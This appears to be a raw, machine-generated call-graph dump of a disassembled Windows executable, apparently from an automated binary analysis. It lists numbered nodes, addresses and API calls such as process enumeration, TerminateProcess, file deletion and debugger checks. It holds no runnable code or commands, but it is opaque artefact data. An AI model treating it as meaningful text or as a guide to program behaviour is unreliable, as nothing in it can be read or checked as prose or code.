98901->98702 98902->98676 98903->98681 98904->98702 98905->98682 98906->98682 98907->98682 98908->98702 98909->98702 98910->98702 98912 a24d51 98911->98912 98921 a24d4b 98911->98921 98913 a5db28 __i64tow 98912->98913 98914 a5da2f 98912->98914 98915 a24d99 98912->98915 98917 a24d57 __itow 98912->98917 98923 a40fe6 Mailbox 59 API calls 98914->98923 98927 a5daa7 Mailbox _wcscpy 98914->98927 99459 a438c8 83 API calls 3 library calls 98915->99459 98919 a40fe6 Mailbox 59 API calls 98917->98919 98920 a24d71 98919->98920 98920->98921 98922 a31a36 59 API calls 98920->98922 98921->98702 98922->98921 98924 a5da74 98923->98924 98925 a40fe6 Mailbox 59 API calls 98924->98925 98926 a5da9a 98925->98926 98926->98927 98928 a31a36 59 API calls 98926->98928 99460 a438c8 83 API calls 3 library calls 98927->99460 98928->98927 98929->98702 98930->98702 98931->98702 98932->98705 98933->98705 98934->98705 98935->98705 98936->98702 98937->98705 98938->98705 99461 a84ce2 98939->99461 98941 a84244 CloseHandle 98941->98705 98942 a84195 Process32NextW 98942->98941 98948 a8418e Mailbox 98942->98948 98943 a31207 59 API calls 98943->98948 98944 a31a36 59 API calls 98944->98948 98945 a40119 59 API calls 98945->98948 98946 a317e0 59 API calls 98946->98948 98948->98941 98948->98942 98948->98943 98948->98944 98948->98945 98948->98946 99467 a3151f 61 API calls 98948->99467 98950 a235e2 98949->98950 98953 a235b0 98949->98953 98950->98805 98951 a235d5 IsDialogMessageW 98951->98950 98951->98953 98952 a5d273 GetClassLongW 98952->98951 98952->98953 98953->98950 98953->98951 98953->98952 98955 a253b0 291 API calls 98954->98955 98956 a2951f 98955->98956 98957 a62001 98956->98957 98965 a29527 _memmove 98956->98965 98958 a25190 Mailbox 59 API calls 98957->98958 98963 a29944 98958->98963 98959 a622c0 98995 a8a48d 89 API calls 4 library calls 98959->98995 98961 a622de 98961->98961 98962 a29583 98962->98816 98966 a40fe6 Mailbox 59 API calls 98963->98966 98964 a2986a 98967 a622b1 98964->98967 98968 a2987f 98964->98968 98965->98959 98965->98962 98965->98963 98971 a40fe6 59 API calls Mailbox 98965->98971 98972 a296cf 98965->98972 98983 a29741 98965->98983 98978 a296e3 _memmove 98966->98978 98994 a9a983 59 API calls 98967->98994 98969 a40fe6 Mailbox 59 API calls 98968->98969 98981 a2977d 98969->98981 98971->98965 98972->98963 98974 a296dc 98972->98974 98973 a40fe6 Mailbox 59 API calls 98977 a2970e 98973->98977 98976 a40fe6 Mailbox 59 API calls 98974->98976 98975 a622a0 98993 a8a48d 89 API calls 4 library calls 98975->98993 98976->98978 98977->98983 98989 a2cca0 291 API calls 98977->98989 98978->98973 98978->98977 98978->98983 98981->98816 98983->98964 98983->98975 98983->98981 98984 a62278 98983->98984 98986 a62253 98983->98986 98990 a28180 291 API calls 98983->98990 98992 a8a48d 89 API calls 4 library calls 98984->98992 98991 a8a48d 89 API calls 4 library calls 98986->98991 98988->98817 98989->98983 98990->98983 98991->98981 98992->98981 98993->98981 98994->98959 98995->98961 98996->98847 98997->98847 98998->98847 98999->98847 99000->98847 99001->98840 99002->98847 99003->98863 99004->98852 99005->98863 99006->98861 99007->98863 99009 a8f898 99008->99009 99010 a8f8f2 99008->99010 99011 a40fe6 Mailbox 59 API calls 99009->99011 99092 a8fbb7 59 API calls 99010->99092 99013 a8f89f 99011->99013 99014 a8f8ab 99013->99014 99071 a33df7 99013->99071 99018 a24d37 84 API calls 99014->99018 99016 a8f9cb 99064 a88cd0 99016->99064 99017 a8f8ff 99017->99016 99020 a8f8d9 99017->99020 99025 a8f93f 99017->99025 99019 a8f8bd 99018->99019 99080 a33e47 99019->99080 99020->98868 99023 a8f9d2 99068 a8394d 99023->99068 99027 a24d37 84 API calls 99025->99027 99026 a8f8cd 99026->99020 99091 a33f0b CloseHandle 99026->99091 99033 a8f946 99027->99033 99030 a8f9c1 99045 a8399c 99030->99045 99031 a8f97a 99034 a3162d 59 API calls 99031->99034 99033->99030 99033->99031 99035 a8f98a 99034->99035 99037 a31c9c 59 API calls 99035->99037 99036 a342cf CloseHandle 99038 a8fa20 99036->99038 99039 a8f994 99037->99039 99038->99020 99093 a33f0b CloseHandle 99038->99093 99040 a31900 59 API calls 99039->99040 99042 a8f9a2 99040->99042 99043 a8399c 66 API calls 99042->99043 99044 a8f9ae Mailbox 99043->99044 99044->99020 99044->99036 99046 a839af 99045->99046 99047 a83a15 99045->99047 99046->99047 99048 a839b4 99046->99048 99049 a8394d 3 API calls 99047->99049 99050 a83a09 99048->99050 99052 a839be 99048->99052 99051 a839fd Mailbox 99049->99051 99118 a83a35 62 API calls Mailbox 99050->99118 99051->99044 99054 a839de 99052->99054 99056 a839c8 99052->99056 99094 a340cd 99054->99094 99058 a340cd 59 API calls 99056->99058 99060 a839d0 99058->99060 99110 a3402a WideCharToMultiByte 99060->99110 99061 a839dc 99107 a8397e 99061->99107 99065 a88cd9 99064->99065 99066 a88cde 99064->99066 99144 a87d6e 61 API calls 2 library calls 99065->99144 99066->99023 99145 a8384c 99068->99145 99070 a83959 WriteFile 99070->99044 99072 a40fe6 Mailbox 59 API calls 99071->99072 99073 a33e07 99072->99073 99074 a342cf CloseHandle 99073->99074 99075 a33e12 99074->99075 99076 a31207 59 API calls 99075->99076 99077 a33e1a 99076->99077 99078 a342cf CloseHandle 99077->99078 99079 a33e21 99078->99079 99079->99014 99081 a342cf CloseHandle 99080->99081 99082 a33e53 99081->99082 99154 a342f9 99082->99154 99084 a33e72 99088 a33e95 99084->99088 99162 a33c61 99084->99162 99086 a33e84 99179 a3389f 99086->99179 99088->99017 99088->99026 99090 a8394d 3 API calls 99090->99088 99091->99020 99092->99017 99093->99020 99095 a40fe6 Mailbox 59 API calls 99094->99095 99096 a340e0 99095->99096 99097 a31c7e 59 API calls 99096->99097 99098 a340ed 99097->99098 99099 a838e0 WideCharToMultiByte 99098->99099 99100 a83908 99099->99100 99101 a83912 99099->99101 99132 a33f20 99100->99132 99103 a40fe6 Mailbox 59 API calls 99101->99103 99104 a83919 WideCharToMultiByte 99103->99104 99119 a33f79 99104->99119 99106 a83910 99106->99061 99108 a8394d 3 API calls 99107->99108 99109 a83990 99108->99109 99109->99051 99111 a34085 99110->99111 99112 a3404e 99110->99112 99114 a33f20 59 API calls 99111->99114 99113 a40fe6 Mailbox 59 API calls 99112->99113 99115 a34055 WideCharToMultiByte 99113->99115 99117 a34077 99114->99117 99116 a33f79 59 API calls 99115->99116 99116->99117 99117->99061 99118->99051 99120 a33f87 99119->99120 99121 a33fc5 99119->99121 99120->99121 99123 a33f92 99120->99123 99143 a836bf 59 API calls _memmove 99121->99143 99124 a33fa0 99123->99124 99125 a705fe 99123->99125 99139 a33f3c 99124->99139 99127 a31c7e 59 API calls 99125->99127 99129 a70608 99127->99129 99128 a33fa8 _memmove 99128->99106 99130 a40fe6 Mailbox 59 API calls 99129->99130 99131 a7061a 99130->99131 99133 a33f31 99132->99133 99134 a705e0 99132->99134 99133->99106 99135 a31c7e 59 API calls 99134->99135 99136 a705ea 99135->99136 99137 a40fe6 Mailbox 59 API calls 99136->99137 99138 a705f6 99137->99138 99140 a33f4e 99139->99140 99142 a33f6c 99139->99142 99141 a40fe6 Mailbox 59 API calls 99140->99141 99141->99142 99142->99128 99143->99128 99144->99066 99146 a8385e 99145->99146 99147 a83853 99145->99147 99146->99070 99152 a342ae SetFilePointerEx 99147->99152 99149 a838b8 SetFilePointerEx 99153 a342ae SetFilePointerEx 99149->99153 99151 a838d7 99151->99070 99152->99149 99153->99151 99155 a34312 CreateFileW 99154->99155 99156 a706fc 99154->99156 99159 a34334 99155->99159 99157 a70702 CreateFileW 99156->99157 99156->99159 99158 a70728 99157->99158 99157->99159 99183 a3410a 99158->99183 99159->99084 99163 a70549 99162->99163 99164 a33c7c 99162->99164 99174 a33d0b 99163->99174 99202 a341d6 99163->99202 99165 a3410a 2 API calls 99164->99165 99164->99174 99166 a33c9e 99165->99166 99193 a3433f 99166->99193 99170 a33cb5 99171 a40fe6 Mailbox 59 API calls 99170->99171 99172 a33cc0 99171->99172 99173 a3433f 59 API calls 99172->99173 99175 a33ccb 99173->99175 99174->99086 99196 a34220 99175->99196 99178 a3410a 2 API calls 99178->99174 99180 a338b5 99179->99180 99181 a338a8 99179->99181 99180->99088 99180->99090 99182 a3410a 2 API calls 99181->99182 99182->99180 99190 a34124 99183->99190 99184 a341ab SetFilePointerEx 99191 a342ae SetFilePointerEx 99184->99191 99187 a706cc 99192 a342ae SetFilePointerEx 99187->99192 99188 a3417f 99188->99159 99189 a706e6 99190->99184 99190->99187 99190->99188 99191->99188 99192->99189 99194 a40fe6 Mailbox 59 API calls 99193->99194 99195 a33ca8 99194->99195 99195->99163 99195->99170 99197 a34293 99196->99197 99201 a3422e 99196->99201 99207 a342ae SetFilePointerEx 99197->99207 99198 a33cf8 99198->99178 99200 a34266 ReadFile 99200->99198 99200->99201 99201->99198 99201->99200 99203 a3410a 2 API calls 99202->99203 99204 a341f7 99203->99204 99205 a3410a 2 API calls 99204->99205 99206 a3420b 99205->99206 99206->99174 99207->99201 99209 a31207 59 API calls 99208->99209 99210 a84024 99209->99210 99211 a31207 59 API calls 99210->99211 99212 a8402d 99211->99212 99213 a31207 59 API calls 99212->99213 99214 a84036 99213->99214 99233 a40284 99214->99233 99219 a8405c 99245 a40119 99219->99245 99220 a31900 59 API calls 99220->99219 99222 a84070 FindFirstFileW 99223 a840fc FindClose 99222->99223 99224 a8408f 99222->99224 99229 a84107 Mailbox 99223->99229 99224->99223 99225 a84093 99224->99225 99225->99224 99226 a840d7 FindNextFileW 99225->99226 99227 a31c9c 59 API calls 99225->99227 99228 a317e0 59 API calls 99225->99228 99230 a31900 59 API calls 99225->99230 99226->99224 99226->99225 99227->99225 99228->99225 99229->98873 99231 a840c8 DeleteFileW 99230->99231 99231->99226 99232 a840f3 FindClose 99231->99232 99232->99229 99296 a51b70 99233->99296 99236 a402b0 99238 a31821 59 API calls 99236->99238 99237 a402cd 99302 a319e1 99237->99302 99240 a402bc 99238->99240 99298 a3133d 99240->99298 99243 a84fec GetFileAttributesW 99244 a8404a 99243->99244 99244->99219 99244->99220 99246 a31207 59 API calls 99245->99246 99247 a4012f 99246->99247 99248 a31207 59 API calls 99247->99248 99249 a40137 99248->99249 99250 a31207 59 API calls 99249->99250 99251 a4013f 99250->99251 99252 a31207 59 API calls 99251->99252 99253 a40147 99252->99253 99254 a7627d 99253->99254 99255 a4017b 99253->99255 99256 a31c9c 59 API calls 99254->99256 99257 a31462 59 API calls 99255->99257 99258 a76286 99256->99258 99259 a40189 99257->99259 99260 a319e1 59 API calls 99258->99260 99261 a31981 59 API calls 99259->99261 99263 a401be 99260->99263 99262 a40193 99261->99262 99262->99263 99264 a31462 59 API calls 99262->99264 99265 a401fe 99263->99265 99266 a401dd 99263->99266 99278 a762a6 99263->99278 99267 a401b4 99264->99267 99306 a31462 99265->99306 99319 a31609 99266->99319 99270 a31981 59 API calls 99267->99270 99269 a76376 99274 a31821 59 API calls 99269->99274 99270->99263 99272 a4020f 99273 a40221 99272->99273 99276 a31c9c 59 API calls 99272->99276 99277 a40231 99273->99277 99279 a31c9c 59 API calls 99273->99279 99291 a76333 99274->99291 99276->99273 99281 a40238 99277->99281 99283 a31c9c 59 API calls 99277->99283 99278->99269 99280 a7635f 99278->99280 99289 a762dd 99278->99289 99279->99277 99280->99269 99285 a7634a 99280->99285 99284 a31c9c 59 API calls 99281->99284 99293 a4023f Mailbox 99281->99293 99282 a31462 59 API calls 99282->99265 99283->99281 99284->99293 99288 a31821 59 API calls 99285->99288 99286 a7633b 99287 a31821 59 API calls 99286->99287 99287->99291 99288->99291 99289->99286 99294 a76326 99289->99294 99290 a31609 59 API calls 99290->99291 99291->99265 99291->99290 99322 a3153b 59 API calls 2 library calls 99291->99322 99293->99222 99295 a31821 59 API calls 99294->99295 99295->99291 99297 a40291 GetFullPathNameW 99296->99297 99297->99236 99297->99237 99299 a3134b 99298->99299 99300 a31981 59 API calls 99299->99300 99301 a3135b 99300->99301 99301->99243 99303 a319fb 99302->99303 99304 a319ee 99302->99304 99305 a40fe6 Mailbox 59 API calls 99303->99305 99304->99240 99305->99304 99307 a31471 99306->99307 99308 a314ce 99306->99308 99307->99308 99310 a3147c 99307->99310 99309 a31981 59 API calls 99308->99309 99315 a3149f _memmove 99309->99315 99311 a31497 99310->99311 99312 a6f1de 99310->99312 99314 a31b7c 59 API calls 99311->99314 99313 a31c7e 59 API calls 99312->99313 99316 a6f1e8 99313->99316 99314->99315 99315->99272 99317 a40fe6 Mailbox 59 API calls 99316->99317 99318 a6f208 99317->99318 99320 a31aa4 59 API calls 99319->99320 99321 a31614 99320->99321 99321->99265 99321->99282 99322->99291 99324 a40fe6 Mailbox 59 API calls 99323->99324 99325 a25285 99324->99325 99326 a25294 99325->99326 99327 a31a36 59 API calls 99325->99327 99326->98884 99327->99326 99329 a431ae 99328->99329 99330 a43139 99328->99330 99348 a431c0 60 API calls 3 library calls 99329->99348 99333 a4315e 99330->99333 99346 a48d58 58 API calls __getptd_noexit 99330->99346 99332 a431bb 99332->98894 99333->98894 99335 a43145 99347 a48fe6 9 API calls __cftof2_l 99335->99347 99337 a43150 99337->98894 99338->98894 99339->98894 99341 a24f87 99340->99341 99342 a24f48 99340->99342 99343 a31c9c 59 API calls 99341->99343 99344 a40fe6 Mailbox 59 API calls 99342->99344 99345 a24f5b 99343->99345 99344->99345 99345->98894 99346->99335 99347->99337 99348->99332 99350 a24d37 84 API calls 99349->99350 99351 a9d203 99350->99351 99366 a9d24a Mailbox 99351->99366 99387 a9de8e 99351->99387 99353 a9d617 99437 a9dfb1 92 API calls Mailbox 99353->99437 99356 a9d626 99357 a9d4b0 99356->99357 99359 a9d632 99356->99359 99400 a9d057 99357->99400 99358 a24d37 84 API calls 99365 a9d29b Mailbox 99358->99365 99359->99366 99364 a9d4e9 99415 a40e38 99364->99415 99365->99358 99365->99366 99374 a9d4a2 99365->99374 99419 a8fc0d 59 API calls 2 library calls 99365->99419 99420 a9d6c8 61 API calls 2 library calls 99365->99420 99366->98901 99369 a9d51c 99422 a247be 99369->99422 99370 a9d503 99421 a8a48d 89 API calls 4 library calls 99370->99421 99373 a9d50e GetCurrentProcess TerminateProcess 99373->99369 99374->99353 99374->99357 99379 a9d68d 99379->99366 99383 a9d6a1 FreeLibrary 99379->99383 99380 a9d554 99434 a9dd32 107 API calls _free 99380->99434 99383->99366 99386 a9d565 99386->99379 99435 a24230 59 API calls Mailbox 99386->99435 99436 a2523c 59 API calls 99386->99436 99438 a9dd32 107 API calls _free 99386->99438 99388 a31aa4 59 API calls 99387->99388 99389 a9dea9 CharLowerBuffW 99388->99389 99439 a7f903 99389->99439 99393 a31207 59 API calls 99394 a9dee2 99393->99394 99396 a31462 59 API calls 99394->99396 99395 a9df41 Mailbox 99395->99365 99397 a9def9 99396->99397 99398 a31981 59 API calls 99397->99398 99399 a9df05 Mailbox 99398->99399 99399->99395 99446 a9d6c8 61 API calls 2 library calls 99399->99446 99401 a9d0c7 99400->99401 99402 a9d072 99400->99402 99406 a9e139 99401->99406 99403 a40fe6 Mailbox 59 API calls 99402->99403 99405 a9d094 99403->99405 99404 a40fe6 Mailbox 59 API calls 99404->99405 99405->99401 99405->99404 99407 a9e362 Mailbox 99406->99407 99408 a9e15c _strcat _wcscpy __NMSG_WRITE 99406->99408 99407->99364 99408->99407 99409 a250d5 59 API calls 99408->99409 99410 a2502b 59 API calls 99408->99410 99411 a25087 59 API calls 99408->99411 99412 a24d37 84 API calls 99408->99412 99413 a4593c 58 API calls __malloc_crt 99408->99413 99449 a85e42 61 API calls 2 library calls 99408->99449 99409->99408 99410->99408 99411->99408 99412->99408 99413->99408 99417 a40e4d 99415->99417 99416 a40ee5 CreateToolhelp32Snapshot 99418 a40eb3 99416->99418 99417->99416 99417->99418 99418->99369 99418->99370 99419->99365 99420->99365 99421->99373 99423 a247c6 99422->99423 99424 a40fe6 Mailbox 59 API calls 99423->99424 99425 a247d4 99424->99425 99427 a247e0 99425->99427 99450 a246ec 59 API calls Mailbox 99425->99450 99428 a24540 99427->99428 99451 a24650 99428->99451 99430 a40fe6 Mailbox 59 API calls 99432 a245eb 99430->99432 99431 a2454f 99431->99430 99431->99432 99432->99386 99433 a24230 59 API calls Mailbox 99432->99433 99433->99380 99434->99386 99435->99386 99436->99386 99437->99356 99438->99386 99441 a7f92e __NMSG_WRITE 99439->99441 99440 a7f96d 99440->99393 99440->99399 99441->99440 99442 a7fa14 99441->99442 99443 a7f963 99441->99443 99442->99440 99448 a314db 61 API calls 99442->99448 99443->99440 99447 a314db 61 API calls 99443->99447 99446->99395 99447->99443 99448->99442 99449->99408 99450->99427 99452 a24659 Mailbox 99451->99452 99453 a5d6ec 99452->99453 99458 a24663 99452->99458 99454 a40fe6 Mailbox 59 API calls 99453->99454 99456 a5d6f8 99454->99456 99455 a2466a 99455->99431 99457 a25190 Mailbox 59 API calls 99457->99458 99458->99455 99458->99457 99459->98917 99460->98913 99462 a84d09 99461->99462 99463 a84cf0 99461->99463 99469 a437c3 59 API calls __wcstoi64 99462->99469 99463->99462 99466 a84d0f 99463->99466 99468 a4385c GetStringTypeW _iswctype 99463->99468 99466->98948 99467->98948 99468->99463 99469->99466 99470->98754 99471->98788 99472->98788 99473->98781 99474->98780 99475->98793 99476->98780 99477->98780 99478->98797 99479 a47e83 99480 a47e8f __alloc_osfhnd 99479->99480 99516 a4a038 GetStartupInfoW 99480->99516 99482 a47e94 99518 a48dac GetProcessHeap 99482->99518 99484 a47eec 99485 a47ef7 99484->99485 99601 a47fd3 58 API calls 3 library calls 99484->99601 99519 a49d16 99485->99519 99488 a47efd 99489 a47f08 __RTC_Initialize 99488->99489 99602 a47fd3 58 API calls 3 library calls 99488->99602 99540 a4d802 99489->99540 99492 a47f17 99493 a47f23 GetCommandLineW 99492->99493 99603 a47fd3 58 API calls 3 library calls 99492->99603 99559 a55153 GetEnvironmentStringsW 99493->99559 99496 a47f22 99496->99493 99499 a47f3d 99500 a47f48 99499->99500 99604 a432e5 58 API calls 3 library calls 99499->99604 99569 a54f88 99500->99569 99503 a47f4e 99504 a47f59 99503->99504 99605 a432e5 58 API calls 3 library calls 99503->99605 99583 a4331f 99504->99583 99507 a47f61 99508 a47f6c __wwincmdln 99507->99508 99606 a432e5 58 API calls 3 library calls 99507->99606 99589 a35f8b 99508->99589 99511 a47f80 99512 a47f8f 99511->99512 99607 a43588 58 API calls _doexit 99511->99607 99608 a43310 58 API calls _doexit 99512->99608 99515 a47f94 __alloc_osfhnd 99517 a4a04e 99516->99517 99517->99482 99518->99484 99609 a433b7 36 API calls 2 library calls 99519->99609 99521 a49d1b 99610 a49f6c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 99521->99610 99523 a49d20 99524 a49d24 99523->99524 99612 a49fba TlsAlloc 99523->99612 99611 a49d8c 61 API calls 2 library calls 99524->99611 99527 a49d36 99527->99524 99529 a49d41 99527->99529 99528 a49d29 99528->99488 99613 a48a05 99529->99613 99532 a49d83 99621 a49d8c 61 API calls 2 library calls 99532->99621 99535 a49d62 99535->99532 99537 a49d68 99535->99537 99536 a49d88 99536->99488 99620 a49c63 58 API calls 4 library calls 99537->99620 99539 a49d70 GetCurrentThreadId 99539->99488 99541 a4d80e __alloc_osfhnd 99540->99541 99542 a49e3b __lock 58 API calls 99541->99542 99543 a4d815 99542->99543 99544 a48a05 __calloc_crt 58 API calls 99543->99544 99545 a4d826 99544->99545 99546 a4d891 GetStartupInfoW 99545->99546 99547 a4d831 __alloc_osfhnd @_EH4_CallFilterFunc@8 99545->99547 99548 a4d9d5 99546->99548 99553 a4d8a6 99546->99553 99547->99492 99549 a4da9d 99548->99549 99554 a4da22 GetStdHandle 99548->99554 99555 a4da35 GetFileType 99548->99555 99634 a4a05b InitializeCriticalSectionAndSpinCount 99548->99634 99635 a4daad LeaveCriticalSection _doexit 99549->99635 99550 a4d8f4 99550->99548 99556 a4d928 GetFileType 99550->99556 99633 a4a05b InitializeCriticalSectionAndSpinCount 99550->99633 99552 a48a05 __calloc_crt 58 API calls 99552->99553 99553->99548 99553->99550 99553->99552 99554->99548 99555->99548 99556->99550 99560 a55164 99559->99560 99561 a47f33 99559->99561 99636 a48a4d 58 API calls 2 library calls 99560->99636 99565 a54d4b GetModuleFileNameW 99561->99565 99563 a5518a _memmove 99564 a551a0 FreeEnvironmentStringsW 99563->99564 99564->99561 99566 a54d7f _wparse_cmdline 99565->99566 99568 a54dbf _wparse_cmdline 99566->99568 99637 a48a4d 58 API calls 2 library calls 99566->99637 99568->99499 99570 a54fa1 __NMSG_WRITE 99569->99570 99571 a54f99 99569->99571 99572 a48a05 __calloc_crt 58 API calls 99570->99572 99571->99503 99574 a54fca __NMSG_WRITE 99572->99574 99573 a55021 99575 a42f85 _free 58 API calls 99573->99575 99574->99571 99574->99573 99576 a48a05 __calloc_crt 58 API calls 99574->99576 99577 a55046 99574->99577 99580 a5505d 99574->99580 99638 a54837 58 API calls __cftof2_l 99574->99638 99575->99571 99576->99574 99578 a42f85 _free 58 API calls 99577->99578 99578->99571 99639 a48ff6 IsProcessorFeaturePresent 99580->99639 99582 a55069 99582->99503 99584 a4332b __IsNonwritableInCurrentImage 99583->99584 99662 a4a701 99584->99662 99586 a43349 __initterm_e 99587 a42f70 __cinit 67 API calls 99586->99587 99588 a43368 __cinit __IsNonwritableInCurrentImage 99586->99588 99587->99588 99588->99507 99590 a36044 99589->99590 99591 a35fa5 99589->99591 99590->99511 99592 a35fdf IsThemeActive 99591->99592 99665 a4359c 99592->99665 99596 a3600b 99677 a35f00 SystemParametersInfoW SystemParametersInfoW 99596->99677 99598 a36017 99678 a35240 99598->99678 99600 a3601f SystemParametersInfoW 99600->99590 99601->99485 99602->99489 99603->99496 99607->99512 99608->99515 99609->99521 99610->99523 99611->99528 99612->99527 99616 a48a0c 99613->99616 99615 a48a47 99615->99532 99619 a4a016 TlsSetValue 99615->99619 99616->99615 99618 a48a2a 99616->99618 99622 a55426 99616->99622 99618->99615 99618->99616 99630 a4a362 Sleep 99618->99630 99619->99535 99620->99539 99621->99536 99623 a55431 99622->99623 99628 a5544c 99622->99628 99624 a5543d 99623->99624 99623->99628 99631 a48d58 58 API calls __getptd_noexit 99624->99631 99626 a5545c RtlAllocateHeap 99627 a55442 99626->99627 99626->99628 99627->99616 99628->99626 99628->99627 99632 a435d1 DecodePointer 99628->99632 99630->99618 99631->99627 99632->99628 99633->99550 99634->99548 99635->99547 99636->99563 99637->99568 99638->99574 99640 a49001 99639->99640 99645 a48e89 99640->99645 99644 a4901c 99644->99582 99646 a48ea3 _memset ___raise_securityfailure 99645->99646 99647 a48ec3 IsDebuggerPresent 99646->99647 99653 a4a385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99647->99653 99650 a48f87 ___raise_securityfailure 99654 a4c826 99650->99654 99651 a48faa 99652 a4a370 GetCurrentProcess TerminateProcess 99651->99652 99652->99644 99653->99650 99655 a4c830 IsProcessorFeaturePresent 99654->99655 99656 a4c82e 99654->99656 99658 a55b3a 99655->99658 99656->99651 99661 a55ae9 5 API calls ___raise_securityfailure 99658->99661 99660 a55c1d 99660->99651 99661->99660 99663 a4a704 EncodePointer 99662->99663 99663->99663 99664 a4a71e 99663->99664 99664->99586 99666 a49e3b __lock 58 API calls 99665->99666 99667 a435a7 DecodePointer EncodePointer 99666->99667 99730 a49fa5 LeaveCriticalSection 99667->99730 99669 a36004 99670 a43604 99669->99670 99671 a4360e 99670->99671 99672 a43628 99670->99672 99671->99672 99731 a48d58 58 API calls __getptd_noexit 99671->99731 99672->99596 99674 a43618 99732 a48fe6 9 API calls __cftof2_l 99674->99732 99676 a43623 99676->99596 99677->99598 99679 a3524d __write_nolock 99678->99679 99680 a31207 59 API calls 99679->99680 99681 a35258 GetCurrentDirectoryW 99680->99681 99733 a34ec8 99681->99733 99683 a3527e IsDebuggerPresent 99684 a70b21 MessageBoxA 99683->99684 99685 a3528c 99683->99685 99687 a70b39 99684->99687 99686 a352a0 99685->99686 99685->99687 99801 a331bf 99686->99801 99841 a3314d 59 API calls Mailbox 99687->99841 99690 a70b49 99698 a70b5f SetCurrentDirectoryW 99690->99698 99697 a3536c Mailbox 99697->99600 99698->99697 99730->99669 99731->99674 99732->99676 99734 a31207 59 API calls 99733->99734 99735 a34ede 99734->99735 99850 a35420 99735->99850 99737 a34efc 99738 a319e1 59 API calls 99737->99738 99739 a34f10 99738->99739 99740 a31c9c 59 API calls 99739->99740 99741 a34f1b 99740->99741 99864 a2477a 99741->99864 99744 a31a36 59 API calls 99745 a34f34 99744->99745 99746 a239be 68 API calls 99745->99746 99747 a34f44 Mailbox 99746->99747 99748 a31a36 59 API calls 99747->99748 99749 a34f68 99748->99749 99750 a239be 68 API calls 99749->99750 99751 a34f77 Mailbox 99750->99751 99752 a31207 59 API calls 99751->99752 99753 a34f94 99752->99753 99867 a355bc 99753->99867 99756 a4312d _W_store_winword 60 API calls 99757 a34fae 99756->99757 99758 a70a54 99757->99758 99759 a34fb8 99757->99759 99760 a355bc 59 API calls 99758->99760 99761 a4312d _W_store_winword 60 API calls 99759->99761 99762 a70a68 99760->99762 99763 a34fc3 99761->99763 99765 a355bc 59 API calls 99762->99765 99763->99762 99764 a34fcd 99763->99764 99766 a4312d _W_store_winword 60 API calls 99764->99766 99767 a70a84 99765->99767 99768 a34fd8 99766->99768 99770 a400cf 61 API calls 99767->99770 99768->99767 99769 a34fe2 99768->99769 99771 a4312d _W_store_winword 60 API calls 99769->99771 99772 a70aa7 99770->99772 99773 a34fed 99771->99773 99774 a355bc 59 API calls 99772->99774 99775 a34ff7 99773->99775 99776 a70ad0 99773->99776 99778 a70ab3 99774->99778 99779 a3501b 99775->99779 99780 a31c9c 59 API calls 99775->99780 99777 a355bc 59 API calls 99776->99777 99781 a70aee 99777->99781 99782 a31c9c 59 API calls 99778->99782 99785 a247be 59 API calls 99779->99785 99784 a3500e 99780->99784 99786 a31c9c 59 API calls 99781->99786 99783 a70ac1 99782->99783 99787 a355bc 59 API calls 99783->99787 99788 a355bc 59 API calls 99784->99788 99789 a3502a 99785->99789 99790 a70afc 99786->99790 99787->99776 99788->99779 99791 a24540 59 API calls 99789->99791 99792 a355bc 59 API calls 99790->99792 99793 a35038 99791->99793 99794 a70b0b 99792->99794 99873 a243d0 99793->99873 99794->99794 99796 a2477a 59 API calls 99798 a35055 99796->99798 99797 a243d0 59 API calls 99797->99798 99798->99796 99798->99797 99799 a355bc 59 API calls 99798->99799 99800 a3509b Mailbox 99798->99800 99799->99798 99800->99683 99802 a331cc __write_nolock 99801->99802 99803 a70314 _memset 99802->99803 99804 a331e5 99802->99804 99807 a70330 GetOpenFileNameW 99803->99807 99805 a40284 60 API calls 99804->99805 99806 a331ee 99805->99806 99890 a409c5 99806->99890 99809 a7037f 99807->99809 99810 a31821 59 API calls 99809->99810 99812 a70394 99810->99812 99812->99812 99814 a33203 99908 a3278a 99814->99908 99841->99690 99851 a3542d __write_nolock 99850->99851 99852 a31821 59 API calls 99851->99852 99861 a35590 Mailbox 99851->99861 99854 a3545f 99852->99854 99853 a31609 59 API calls 99853->99854 99854->99853 99856 a35495 Mailbox 99854->99856 99855 a35563 99857 a31a36 59 API calls 99855->99857 99855->99861 99856->99855 99859 a31a36 59 API calls 99856->99859 99856->99861 99863 a31609 59 API calls 99856->99863 99882 a34c94 99856->99882 99858 a35584 99857->99858 99860 a34c94 59 API calls 99858->99860 99859->99856 99860->99861 99861->99737 99863->99856 99865 a40fe6 Mailbox 59 API calls 99864->99865 99866 a24787 99865->99866 99866->99744 99868 a355c6 99867->99868 99869 a355df 99867->99869 99870 a31c9c 59 API calls 99868->99870 99871 a31821 59 API calls 99869->99871 99872 a34fa0 99870->99872 99871->99872 99872->99756 99874 a5d6c9 99873->99874 99876 a243e7 99873->99876 99874->99876 99889 a240cb 59 API calls Mailbox 99874->99889 99877 a244ef 99876->99877 99878 a24530 99876->99878 99879 a244e8 99876->99879 99877->99798 99888 a2523c 59 API calls 99878->99888 99881 a40fe6 Mailbox 59 API calls 99879->99881 99881->99877 99883 a34ca2 99882->99883 99887 a34cc4 _memmove 99882->99887 99886 a40fe6 Mailbox 59 API calls 99883->99886 99884 a40fe6 Mailbox 59 API calls 99885 a34cd8 99884->99885 99885->99856 99886->99887 99887->99884 99888->99877 99889->99876 99891 a51b70 __write_nolock 99890->99891 99892 a409d2 GetLongPathNameW 99891->99892 99893 a31821 59 API calls 99892->99893 99894 a331f7 99893->99894 99895 a32f3d 99894->99895 99896 a31207 59 API calls 99895->99896 99897 a32f4f 99896->99897 99898 a40284 60 API calls 99897->99898 99899 a32f5a 99898->99899 99900 a70177 99899->99900 99901 a32f65 99899->99901 99905 a70191 99900->99905 99948 a3151f 61 API calls 99900->99948 99903 a34c94 59 API calls 99901->99903 99904 a32f71 99903->99904 99942 a21307 99904->99942 99907 a32f84 Mailbox 99907->99814 99949 a349c2 99908->99949 99911 a6f8d6 100065 a89b16 122 API calls 2 library calls 99911->100065 99912 a349c2 136 API calls 99914 a327c3 99912->99914 99914->99911 99916 a327cb 99914->99916 99915 a6f8e7 99917 a6f8eb 99915->99917 99918 a6f908 99915->99918 99920 a327d7 99916->99920 99921 a6f8f3 99916->99921 100066 a34a2f 99917->100066 99919 a40fe6 Mailbox 59 API calls 99918->99919 99941 a6f94d Mailbox 99919->99941 99973 a329be 99920->99973 100072 a847e8 90 API calls _wprintf 99921->100072 99926 a6f901 99926->99918 99927 a6fb01 99935 a6fb12 99938 a31a36 59 API calls 99938->99941 99941->99927 99941->99935 99941->99938 100073 a7fef8 59 API calls 2 library calls 99941->100073 